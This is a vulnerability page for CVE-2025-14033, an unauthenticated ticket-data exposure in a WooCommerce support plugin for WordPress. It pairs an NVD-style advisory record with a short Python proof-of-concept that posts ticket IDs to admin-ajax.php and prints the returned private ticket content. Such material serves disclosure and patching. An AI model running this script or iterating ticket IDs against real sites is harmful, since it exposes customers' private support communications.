CVE-2025-14033

# Proof of Concept for CVE-2025-14033 import requests def check_vulnerability(target_url): # The vulnerable endpoint is typically wp-admin/admin-ajax.php endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Data payload targeting the vulnerable function payload = { "action": "get_ticket_content_callback", "ticket_id": "1" # Attacker can iterate this ID } try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: # Check if response contains ticket data indicators if "ticket" in response.text.lower() or len(response.text) > 0: print(f"[+] Potential Vulnerability Detected at {target_url}") print(f"[+] Response: {response.text[:200]}...") return True except Exception as e: print(f"[-] Error connecting to {target_url}: {e}") return False if __name__ == "__main__": target = "http://example.com" # Replace with target check_vulnerability(target)

{"cve": {"id": "CVE-2025-14033", "sourceIdentifier": "[email protected]", "published": "2026-05-13T06:16:12.747", "lastModified": "2026-05-13T14:43:46.717", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_ticket_content_callback' function in all versions up to, and including, 1.3.0. This makes it possible for unauthenticated attackers to view any support ticket content, including sensitive customer information and private communications, by providing a ticket ID."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L643", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L68", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.3.1/includes/class-wc-support-system.php#L780", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L643", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L68", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/40ceea17-ec60-4775-8495-e2f7643d1b7c?source=cve", "source": "[email protected]"}]}}